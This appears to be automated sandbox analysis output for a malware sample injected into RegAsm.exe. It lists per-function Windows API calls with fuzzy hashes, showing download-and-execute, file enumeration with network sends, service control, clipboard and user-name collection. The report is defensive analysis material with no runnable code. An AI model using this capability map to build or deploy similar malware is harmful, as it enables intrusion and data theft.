                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                                                        • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Service$CloseHandle$Open$ManagerStart
                                                        • String ID:
                                                        • API String ID: 276877138-0
                                                        • Opcode ID: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
                                                        • Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
                                                        • Opcode Fuzzy Hash: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
                                                        • Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
                                                        APIs
                                                          • Part of subcall function 00413584: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000), ref: 004135A4
                                                          • Part of subcall function 00413584: RegQueryValueExA.ADVAPI32 ref: 004135C2
                                                          • Part of subcall function 00413584: RegCloseKey.ADVAPI32(00000000), ref: 004135CD
                                                        • Sleep.KERNEL32(00000BB8), ref: 0040F896
                                                        • ExitProcess.KERNEL32 ref: 0040F905
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseExitOpenProcessQuerySleepValue
                                                        • String ID: 5.1.1 Pro$override$pth_unenc
                                                        • API String ID: 2281282204-2344886030
                                                        • Opcode ID: 0a9b0b8e18e6e63923395880d3987700b8c960eca4e781d2f00c21a7a482b044
                                                        • Instruction ID: d275b5d15c9ff05a0ec0da3c9587874d7690dc7fa5d0ec02d6e8a4ede61593ab
                                                        • Opcode Fuzzy Hash: 0a9b0b8e18e6e63923395880d3987700b8c960eca4e781d2f00c21a7a482b044
                                                        • Instruction Fuzzy Hash: 5921E171B0420127D6087676885B6AE399A9B80708F50453FF409672D7FF7C8E0483AF
                                                        APIs
                                                        • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 00452555
                                                        • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 0045257E
                                                        • GetACP.KERNEL32(?,?,004527DB,?,00000000), ref: 00452593
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: InfoLocale
                                                        • String ID: ACP$OCP
                                                        • API String ID: 2299586839-711371036
                                                        • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                        • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                                                        • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                        • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
                                                        APIs
                                                        • FindResourceA.KERNEL32 ref: 0041B54A
                                                        • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                                                        • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                                                        • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Resource$FindLoadLockSizeof
                                                        • String ID: SETTINGS
                                                        • API String ID: 3473537107-594951305
                                                        • Opcode ID: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                        • Instruction ID: d04f7a3eece584ab18b37ce022e38df3785cd6d6757b7dd0dc659012c7d5cbc3
                                                        • Opcode Fuzzy Hash: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                        • Instruction Fuzzy Hash: 8EE01A76600B22EBEB211BB1AC4CD863E29F7C97637140075F90586231CB798840DA98
                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 004096A5
                                                        • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                                                        • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$File$CloseFirstH_prologNext
                                                        • String ID:
                                                        • API String ID: 1157919129-0
                                                        • Opcode ID: dd0421224294bb62472ab89505622d6763c67607e6c73e6d1c5958e8fabc376b
                                                        • Instruction ID: 8e52766585a78a9bd0f7e398a9017c7fe376444e683812dd136b20495b515571
                                                        • Opcode Fuzzy Hash: dd0421224294bb62472ab89505622d6763c67607e6c73e6d1c5958e8fabc376b
                                                        • Instruction Fuzzy Hash: 7F814C328001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 0040884C
                                                        • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                        • String ID:
                                                        • API String ID: 1771804793-0
                                                        • Opcode ID: 3108295a3ea490f6f4279643bcf91a98a4e8460a72a47f708dfbc03d5f7be2ca
                                                        • Instruction ID: 0d5560aa06bbfb8d15084ed76e809f646cede1ce68103026aeaac9ba950e1e68
                                                        • Opcode Fuzzy Hash: 3108295a3ea490f6f4279643bcf91a98a4e8460a72a47f708dfbc03d5f7be2ca
                                                        • Instruction Fuzzy Hash: 9D517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB89
                                                        APIs
                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                                                        • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: DownloadExecuteFileShell
                                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                                                        • API String ID: 2825088817-3056885514
                                                        • Opcode ID: 25f93c1eb8c7c2b3408b92261e90d72d92bad6cdb28d287bebca9ae006ad5217
                                                        • Instruction ID: 89f65c5a2840bfed21b3c91f130df949caec66636536da5e2ea9f2eef63816fc
                                                        • Opcode Fuzzy Hash: 25f93c1eb8c7c2b3408b92261e90d72d92bad6cdb28d287bebca9ae006ad5217
                                                        • Instruction Fuzzy Hash: 5261B371A0830166CA14FB76C8569BE37A59F81758F40093FB9427B2D3EE3C9905C69B
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                                                        • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileFind$FirstNextsend
                                                        • String ID: XPG$XPG
                                                        • API String ID: 4113138495-1962359302
                                                        • Opcode ID: f1a52394f1a986f7dbfcef978ba307d27b987f60840b982f2ffdd03438d5e8df
                                                        • Instruction ID: fedc3c23448d2be437c2d68ef58725aa3c97e5c0e74d328490a6b39f64eed896
                                                        • Opcode Fuzzy Hash: f1a52394f1a986f7dbfcef978ba307d27b987f60840b982f2ffdd03438d5e8df
                                                        • Instruction Fuzzy Hash: 2D21A4315083015BC714FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA098A5B
                                                        APIs
                                                          • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                          • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                        • EnumSystemLocalesW.KERNEL32(00452143,00000001,00000000,?,JD,?,00452770,00000000,?,?,?), ref: 0045208D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                        • String ID: p'E$JD
                                                        • API String ID: 1084509184-908320845
                                                        • Opcode ID: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                        • Instruction ID: b0e9e6415e7ea3a3ed95e939ef0edb9d062384d4a1a0bde9f31cc9ceae225fa6
                                                        • Opcode Fuzzy Hash: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                        • Instruction Fuzzy Hash: 0211553A2007019FDB189F39C9916BBBB92FF8075AB14482EEE4687B41D7B5A946C740
                                                        APIs
                                                          • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                          • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448301
                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorInfoLastLocale$_free$_abort
                                                        • String ID:
                                                        • API String ID: 2829624132-0
                                                        • Opcode ID: 17aaed6ea9cf6127563f26f501199b73ece46ecde5b2d8f8ea879c6fa7cd1fbc
                                                        • Instruction ID: 283aa9570716a6929da4b93cb0bca45b8c77d553a5ebfd19e37a994bad1de6ac
                                                        • Opcode Fuzzy Hash: 17aaed6ea9cf6127563f26f501199b73ece46ecde5b2d8f8ea879c6fa7cd1fbc
                                                        • Instruction Fuzzy Hash: F361A235500207ABDF289F24CE82B7A77A8EF05306F1441BBED05C6656E7BC9D89CB58
                                                        APIs
                                                        • IsDebuggerPresent.KERNEL32 ref: 0043BC69
                                                        • SetUnhandledExceptionFilter.KERNEL32 ref: 0043BC73
                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                        • String ID:
                                                        • API String ID: 3906539128-0
                                                        • Opcode ID: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                        • Instruction ID: 25e88f5a56b9fbea854716c485460a06fbe33a825339a9765be54c88dd7cea35
                                                        • Opcode Fuzzy Hash: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                        • Instruction Fuzzy Hash: 0431D374901218ABCB21DF65D9887CDBBB8EF0C311F5051EAE81CA7251EB749F818F48
                                                        APIs
                                                        • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,00433550,00000034,?,?,00000000), ref: 004338DA
                                                        • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,PkGNG,004335E3,?,?,?), ref: 004338F0
                                                        • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,PkGNG,004335E3,?,?,?,0041E2E2), ref: 00433902
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Crypt$Context$AcquireRandomRelease
                                                        • String ID:
                                                        • API String ID: 1815803762-0
                                                        • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                        • Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
                                                        • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                        • Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Clipboard$CloseDataOpen
                                                        • String ID:
                                                        • API String ID: 2058664381-0
                                                        • Opcode ID: 26d649817908997ada01c7e81b47d9ed8d660a846a8981428adfc510ab3c4a2f
                                                        • Instruction ID: 1c65eecdd0087a0ffd0b0a04a5b63b9ff0c479b34dfa65f2e767e94bdce73387
                                                        • Opcode Fuzzy Hash: 26d649817908997ada01c7e81b47d9ed8d660a846a8981428adfc510ab3c4a2f
                                                        • Instruction Fuzzy Hash: 45E0EC31745320EFC3206B609C49F9B6AA4DF85B52F05443AB905BB2E5DB78CC4086AD
                                                        APIs
                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00434CCF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FeaturePresentProcessor
                                                        • String ID:
                                                        • API String ID: 2325560087-3916222277
                                                        • Opcode ID: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                        • Instruction ID: 5e37b39ef68b784d6588b9ddffa6793edf4c3ade0924e8be62ba08be237937aa
                                                        • Opcode Fuzzy Hash: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                        • Instruction Fuzzy Hash: E4515B71D002488FEB24CF69D98579EBBF4FB88314F24956BD419EB264D378A940CF98
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .
                                                        • API String ID: 0-248832578
                                                        • Opcode ID: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                                        • Instruction ID: 7baa6cf80f4bdea99dbc4d330b45aada8194c6230f36d830dc1b60d3871032d3
                                                        • Opcode Fuzzy Hash: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                                        • Instruction Fuzzy Hash: DF3107B1900259AFEB24DE7ACC84EFB7BBDEB46318F0401AEF41897291E6349D418B54
                                                        APIs
                                                          • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                          • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                        • EnumSystemLocalesW.KERNEL32(00452393,00000001,?,?,JD,?,00452734,JD,?,?,?,?,?,00444AED,?,?), ref: 00452102
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                        • String ID: JD
                                                        • API String ID: 1084509184-2669065882
                                                        • Opcode ID: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                        • Instruction ID: 883a99871793c155097d9da94a803295819168bd30f8f35cc04eca091e96b9f4
                                                        • Opcode Fuzzy Hash: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                        • Instruction Fuzzy Hash: E8F0FF363007056FDB245F399881A6B7B96FB82769B04482EFE458B682DAB99C42D604
                                                        APIs
                                                        • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: InfoLocale
                                                        • String ID: GetLocaleInfoEx
                                                        • API String ID: 2299586839-2904428671
                                                        • Opcode ID: e3a58a4a2a83d15128b091247adc82563cd448b1edafce75d8cd2e0e094fdf84
                                                        • Instruction ID: 58f0578312c774904006f9ed4749830948a62bec6dc8fde4d932476f73229d15
                                                        • Opcode Fuzzy Hash: e3a58a4a2a83d15128b091247adc82563cd448b1edafce75d8cd2e0e094fdf84
                                                        • Instruction Fuzzy Hash: C0F0F631640608FBDB016F61DC06F6E7B25EB04751F00056EFC0966251DE368D2096DE
                                                        APIs
                                                          • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                          • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                        • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444AF4,?,?,?,?,?,?,00000004), ref: 00451E3A
                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00444AF4,00000000,00444C14), ref: 00451F7B
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast$CodeInfoLocalePageValid_abort_free
                                                        • String ID:
                                                        • API String ID: 1661935332-0
                                                        • Opcode ID: 99cd805ed4c2df00003a48f1a6811e4fd7c7d64455718b3e19dbc584044dc3e8
                                                        • Instruction ID: 2c98265d6c7a89d72caae9d33925a6d6107158c78f730362dcab12f0c71d6669
                                                        • Opcode Fuzzy Hash: 99cd805ed4c2df00003a48f1a6811e4fd7c7d64455718b3e19dbc584044dc3e8
                                                        • Instruction Fuzzy Hash: 7F611976600606AAD714AB75CC42FBB73A8EF04306F14056FFD05DB292EB78E948C769
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,00000000), ref: 00412122
                                                        • HeapFree.KERNEL32(00000000), ref: 00412129
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$FreeProcess
                                                        • String ID:
                                                        • API String ID: 3859560861-0
                                                        • Opcode ID: 95356b50ae1c40d028bb7c10486cf6eec28d3cbd66e590edfc92b155960a397c
                                                        • Instruction ID: dd486cb6b879bf1be37f4e59d5b3b18419fca2aff5c7e471244091183f2ba527
                                                        • Opcode Fuzzy Hash: 95356b50ae1c40d028bb7c10486cf6eec28d3cbd66e590edfc92b155960a397c
                                                        • Instruction Fuzzy Hash: 0D113632000B11AFC7309F54DE85957BBEAFF08715305892EF29682922CB75FCA0CB48
                                                        APIs
                                                          • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                          • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448301
                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast$_free$InfoLocale_abort
                                                        • String ID:
                                                        • API String ID: 1663032902-0
                                                        • Opcode ID: 92b4d6e99215bbe04ae581cd80a63159ab80ee2b3c46d7f2f4da99747f448a1f
                                                        • Instruction ID: 2d4dd0c1c30cd12b50dfb53a4a1f7f5f9091958bb121381f53cce851c87d7921
                                                        • Opcode Fuzzy Hash: 92b4d6e99215bbe04ae581cd80a63159ab80ee2b3c46d7f2f4da99747f448a1f
                                                        • Instruction Fuzzy Hash: F921D632600606ABDB249F25DD41FBB73A8EB06316F10407FED01D6152EBBC9D48CB59
                                                        APIs
                                                          • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                          • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast$InfoLocale_abort_free
                                                        • String ID:
                                                        • API String ID: 2692324296-0
                                                        • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                        • Instruction ID: 8c29d710edde3bbc403447a64c1727e90569dbd09ff88c71ffccea9529c81983
                                                        • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                        • Instruction Fuzzy Hash: C4F04936A00116BBDB245A24D905BBF7B58EB01315F04446BEC05A3241FAF8FD058694
                                                        APIs
                                                        • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: NameUser
                                                        • String ID:
                                                        • API String ID: 2645101109-0
                                                        • Opcode ID: 6f8df8ca086827d3b7a07e2ceec29cc063485458526563a8914dedb1098b546b
                                                        • Instruction ID: 8360233331794fbd8bccde093e114755ab2a7c2896376219b9d5f45c8fb32f7b
                                                        • Opcode Fuzzy Hash: 6f8df8ca086827d3b7a07e2ceec29cc063485458526563a8914dedb1098b546b
                                                        • Instruction Fuzzy Hash: 90014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E88CBA8
                                                        APIs
                                                          • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(?,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                                        • EnumSystemLocalesW.KERNEL32(0044843E,00000001,0046EAE0,0000000C), ref: 004484BC
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalEnterEnumLocalesSectionSystem
                                                        • String ID:
                                                        • API String ID: 1272433827-0
                                                        • Opcode ID: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                        • Instruction ID: 901ea181f65c0ebd25502bb0be635eecd519ab6688482fb1bf3a60b9f01fb263
                                                        • Opcode Fuzzy Hash: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                        • Instruction Fuzzy Hash: 37F04F76A50200EFEB00EF69D946B4D37E0FB04725F10446EF514DB2A2DB7899809B49
                                                        APIs
                                                          • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
